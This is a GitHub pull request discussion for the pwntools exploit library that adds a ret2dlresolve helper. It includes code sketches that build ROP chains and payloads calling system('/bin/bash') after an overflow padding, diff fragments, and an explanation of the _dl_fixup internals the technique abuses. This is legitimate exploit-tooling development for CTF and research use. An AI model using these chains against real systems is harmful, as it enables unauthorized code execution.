Add ret2dlresolve #1436

klecko · 2020-02-26T23:18:07Z

Ret2dlresolve

This PR aims to introduce a friendly interface for creating ret2dlresolve payloads. It supports calling any libc symbol with any argument, same as ROP when stack address is known, without having a leak. The generated rop chain calls (ideally) read to introduce the payload with ElfSym and ElfRel structures and with data needed for the arguments, such as pointers and strings, and then calls _dl_fixup with an appropiate reloc index, which will resolve and call the symbol.

Testing and documentation

TODO

Target Branch

Dev

klecko · 2020-03-06T21:02:47Z

Help with the design

I need some help with the design.

Ret2dlresolve technique includes a payload containing the dl-resolve-related structures and other things, and the rop chain that reads the payload and calls dl-resolve.

Current design

Right now we have a new file ret2dlresolve.py, whose important members are:

Class Ret2dlresolve, which builds the payload with the structures. Requires elf and symbol that will be called.
Class Ret2dlresolveRop, which requires the elf, the symbol that will be called and the args for that call, and also the address where the payload will be placed. It inherits from Ret2dlresolve and makes it build the payload, processes the arguments, adds to that payload strings and pointers related with them, and provides a function get_rop for creating the rop chain.

Therefore, the way of exploiting a binary would be something like:

# Creates the object
ret2dlresolve = Ret2dlresolveRop(elf, symbol="system", args=["/bin/bash"])

# Gets an address inside .bss for saving payload2
DATA_ADDR = ret2dlresolve.get_recommended_address()

# Creates the structures, processes arguments and adds necessary strings and pointers.
# Maybe it's better make it call get_recommended_address if no address is provided,
# as in design 2.
payload2 = ret2dlresolve.build(DATA_ADDR)

# Creates the rop chain. Needs processed arguments
# (real arg is not "/bin/bash" but a pointer to payload2 where that string is)
rop = ret2dlresolve.get_rop(read_func="read", read_func_args=[0, DATA_ADDR])
raw_rop = rop.chain() 

payload = padding_for_overflow + raw_rop
p.sendline(payload + payload2)

Design 2

Another option could be having just a class Ret2dlresolve in ret2dlresolve.py, and a method ret2dlresolve inside ROP class.

Class Ret2dlresolve would require the elf, the symbol, the args and the address where the payload will be placed. It would build the payload, process the arguments and add related stuff to the payload.
Method ret2dlresolve would require the reloc index and the real args given by the class Ret2dlresolve. It would create the rop chain.

This time, the above code would be:

# Creates the structures, processes arguments and adds necessary strings and pointers
# If an address is not provided, it uses one inside .bss. The payload in the attribute payload
dlresolve = Ret2dlresolve(elf, symbol="system", args=["/bin/bash"])
data_addr = dlresolve.data_addr

rop = ROP(elf)

#Creates the rop chain. Needs processed arguments
rop.ret2dlresolve(reloc_index=dlresolve.reloc_index, real_args=dlresolve.real_args, \
	read_func="read", read_func_args=[0, data_addr])
raw_rop = rop.chain()

payload = padding_for_overflow + raw_rop
payload2 = dlresolve.payload
p.sendline(payload + payload2)

Design 3

The last option I thought is creating a class Ret2dlresolveRop that inherits from both ROP and Ret2dlresolve (the one of the current design).
I haven't tried it, but the code would be something like:

# Builds the payload
ret2dlresolve = Ret2dlresolveRop(elf, symbol="system", args=["/bin/bash"], \
	read_func="read", read_func_args=[0, DATA_ADDR], data_addr=DATA_ADDR)

# Builds the chain
raw_rop = ret2dlresolve.chain()

payload = padding_for_overflow + raw_rop
payload2 = ret2dlresolve.payload
p.sendline(payload + payload2)

I would appreciate every feedback, idea or opinion.

zachriggle · 2020-03-09T20:03:37Z

If we could have tests for this it would be great, particularly for amd64

On Fri, Mar 6, 2020 at 3:02 PM Klesoft ***@***.***> wrote: Help with the design I need some help with the design. Ret2dlresolve technique includes a payload containing the dl-resolve-related structures and other things, and the rop chain that reads the payload and calls dl-resolve. Current design Right now we have a new file ret2dlresolve.py, whose important members are: - Class Ret2dlresolve, which builds the payload with the structures. Requires elf and symbol that will be called. - Class Ret2dlresolveRop, which requires the elf, the symbol that will be called and the args for that call, and also the address where the payload will be placed. It inherits from Ret2dlresolve and makes it build the payload, processes the arguments, adds to that payload strings and pointers related with them, and provides a function get_rop for creating the rop chain. Therefore, the way of exploiting a binary would be something like: # Creates the object ret2dlresolve = Ret2dlresolveRop(elf, symbol="system", args=["/bin/bash"]) # Gets an address inside .bss for saving payload2DATA_ADDR = ret2dlresolve.get_recommended_address() # Creates the structures, processes arguments and adds necessary strings and pointers.# Maybe it's better make it call get_recommended_address if no address is provided,# as in design 2. payload2 = ret2dlresolve.build(DATA_ADDR) # Creates the rop chain. Needs processed arguments# (real arg is not "/bin/bash" but a pointer to payload2 where that string is) rop = ret2dlresolve.get_rop(read_func="read", read_func_args=[0, DATA_ADDR]) raw_rop = rop.chain() payload = padding_for_overflow + raw_rop p.sendline(payload + payload2) Design 2 Another option could be having just a class Ret2dlresolve in ret2dlresolve.py, and a method ret2dlresolve inside ROP class. - Class Ret2dlresolve would require the elf, the symbol, the args and the address where the payload will be placed. It would build the payload, process the arguments and add related stuff to the payload. - Method ret2dlresolve would require the reloc index and the real args given by the class Ret2dlresolve. It would create the rop chain. This time, the above code would be: # Creates the structures, processes arguments and adds necessary strings and pointers# If an address is not provided, it uses one inside .bss. The payload in the attribute payload dlresolve = Ret2dlresolve(elf, symbol="system", args=["/bin/bash"]) data_addr = dlresolve.data_addr rop = ROP(elf) #Creates the rop chain. Needs processed arguments rop.ret2dlresolve(reloc_index=dlresolve.reloc_index, real_args=dlresolve.real_args, \ read_func="read", read_func_args=[0, data_addr]) raw_rop = rop.chain() payload = padding_for_overflow + raw_rop payload2 = dlresolve.payload p.sendline(payload + payload2) Design 3 The last option I thought is creating a class Ret2dlresolveRop that inherits from both ROP and Ret2dlresolve (the one of the current design). I haven't tried it, but the code would be something like: # Builds the payload ret2dlresolve = Ret2dlresolveRop(elf, symbol="system", args=["/bin/bash"], \ read_func="read", read_func_args=[0, DATA_ADDR], data_addr=DATA_ADDR) # Builds the chain raw_rop = ret2dlresolve.chain() payload = padding_for_overflow + raw_rop payload2 = ret2dlresolve.payload p.sendline(payload + payload2) I would appreciate every feedback, idea or opinion. — You are receiving this because you are subscribed to this thread. Reply to this email directly, view it on GitHub <#1436?email_source=notifications&email_token=AAA3IGALPAUVBXSJWZV2IY3RGFQHRA5CNFSM4K4P63LKYY3PNVWWK3TUL52HS4DFVREXG43VMVBW63LNMVXHJKTDN5WW2ZLOORPWSZGOEOC3BLI#issuecomment-595964077>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/AAA3IGEXLQ5VCDNBT727O33RGFQHRANCNFSM4K4P63LA> .

-- *Zach Riggle*

Arusekk · 2020-03-22T19:04:47Z

This looks great, I would see design number two best (consistent with what pwntools style of doing things). Also, it would be awesome if you added some tests to the new code.

klecko · 2020-04-04T18:16:15Z

pwnlib/rop/rop.py

+            self.raw(plt_init)    # call plt_init
+            self.raw(reloc_index) # arg for plt init
+            self.raw(0xDEADBEEF)  # ret
+            for arg in real_args: # args for the called symbol
+                self.raw(arg)


Is there a better way to do this?

klecko · 2020-04-04T18:32:18Z

pwnlib/rop/rop.py

+        plt_init = elf.get_section_by_name(".plt").header.sh_addr + elf_base
+        log.debug("PLT_INIT: %s", hex(plt_init))
+
+        self.call(read_func, read_func_args)


I think getting read_func and read_func_args can be somewhat automated having the elf, but I'm not sure how.

klecko · 2020-04-04T19:13:37Z

I've already changed the design and added a test. I will also add documentation as soon as you agree with the design. Some points:

I haven't considered py2-py3 compatibility, but I guess I should. Is there anything else to take into account besides six types?
I have no idea about other architectures appart from amd64 & x86. Should my code work on them too? Should there be tests for each arch? I've seen examples of the fmtstr module for each arch but I think they weren't tests.
Right now none of Ret2dlresolvePayload attributes are thought to be modified after creating the object. Should they start with _? Maybe they should be abled to be changed, and then the payload is built again?
I had written the test for amd64 first, and it worked in my pc but it didn't work in the docker you provide for running tests. I've discovered it's because the docker has an older version of gcc (5.4.0). The usual exploit method involves calling read to introduce the payload in .bss. In the test binary compiled by the docker, .bss address was 0x601038 while in my computer it was 0x404030, both having 0x400000 as load address.
If you take a look at _dl_fixup source code (here), you can see how the value ELFW(R_SYM) (reloc->r_info) is used twice as index, once in line 73 for getting the elf sym from the symtab, and once in line 92 for getting the versym entry associated with that symbol. We set this index in a way that it gets the elf sym we craft, and we just hope that the versym entry is a valid address, which doesn't happen to be in older binaries. This is because there's a lot of space between .dynamic at 0x40XXXX and our payload at 0x60XXXX that isn't mapped, which doesn't happen in new binaries. The versym entry address falls in that unmapped region causing segmentation fault. I simply think those 64bits binaries are unexploitable using ret2dlresolve.
This doesn't seem to be a problem for 32bits binaries nor newer 64bits binaries. Current test passed in the docker. Maybe a check to see if the versym entry is a valid address should be added?

Any feedback is greatly appreciated.

Arusekk · 2020-04-28T18:00:25Z

I have now had more time to look at this PR. This is great, but it looks cumbersome to be used for now. Also, it looks like the ret2dlresolve does not have to be the last call in the ROP chain, although it assumes so for x86 (is it necessary?). I quite like what SROP does (I wanted this to be just like SROP, but this would come next). I also had the idea of adding a parameter to ROP.call that would handle this transparently, but this would be a separate effort, so let's merge this first.

Added ret2dlresolve

c4b514f

klecko added 3 commits April 4, 2020 12:56

Changed design

5acabdd

Added test

d16370b

Changed test to 32 bits, 64 bits seems broken for now

c9dad72

klecko marked this pull request as ready for review April 4, 2020 18:11

klecko commented Apr 4, 2020

View reviewed changes

Merge branch 'dev' of https://github.com/Gallopsled/pwntools into dev

8699639

Arusekk merged commit 2a7676c into Gallopsled:dev Apr 29, 2020

Arusekk mentioned this pull request Oct 27, 2020

Better ROP with dl_resolve and magic gadget #1134

Closed

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Add ret2dlresolve #1436

Add ret2dlresolve #1436

klecko commented Feb 26, 2020

klecko commented Mar 6, 2020

zachriggle commented Mar 9, 2020 via email

Arusekk commented Mar 22, 2020

klecko Apr 4, 2020

klecko Apr 4, 2020

klecko commented Apr 4, 2020

Arusekk commented Apr 28, 2020

Add ret2dlresolve #1436

Add ret2dlresolve #1436

Conversation

klecko commented Feb 26, 2020

Ret2dlresolve

Testing and documentation

Target Branch

klecko commented Mar 6, 2020

Help with the design

Current design

Design 2

Design 3

zachriggle commented Mar 9, 2020 via email

Arusekk commented Mar 22, 2020

klecko Apr 4, 2020

Choose a reason for hiding this comment

klecko Apr 4, 2020

Choose a reason for hiding this comment

klecko commented Apr 4, 2020

Arusekk commented Apr 28, 2020